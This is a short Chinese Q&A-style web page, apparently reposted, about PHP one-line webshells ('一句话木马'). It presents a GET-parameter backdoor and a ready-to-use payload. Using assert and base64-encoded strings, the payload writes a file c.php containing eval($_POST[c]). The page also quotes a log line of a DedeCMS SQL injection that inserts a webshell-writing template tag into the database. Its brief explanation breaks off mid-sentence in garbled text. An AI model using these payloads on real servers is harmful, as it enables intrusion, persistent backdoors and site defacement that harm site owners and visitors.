php一句话木马~呢?

php一句话木马~呢?,第1张

超级隐蔽的PHP后门:
<php $_GET[a]($_GET[b]);>
仅用GET函数就构成了木马
利用方法:
a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
执行后当前目录生成cphp一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用

121199250||/plus/downloadphpopen= || INSERT INTO `dede_myad` SET `normbody` = '{dede:php}file_put_contents(''k'',''<php eval($_POST[k]);>'');{/dede:php}'');{/dede:php}' WHERE `aid` =1#downloads`(`hash`,`id`,`downloads`) VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect
看这一段大概可以看懂吧,应该是像数据库里面插入了什么东西!
insert into set where values

这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
首先,第一次出现的代码是比较原始的窗口d出(就是将">

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/13364846.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-07-22
下一篇 2023-07-22

发表评论

登录后才能评论

评论列表(0条)

保存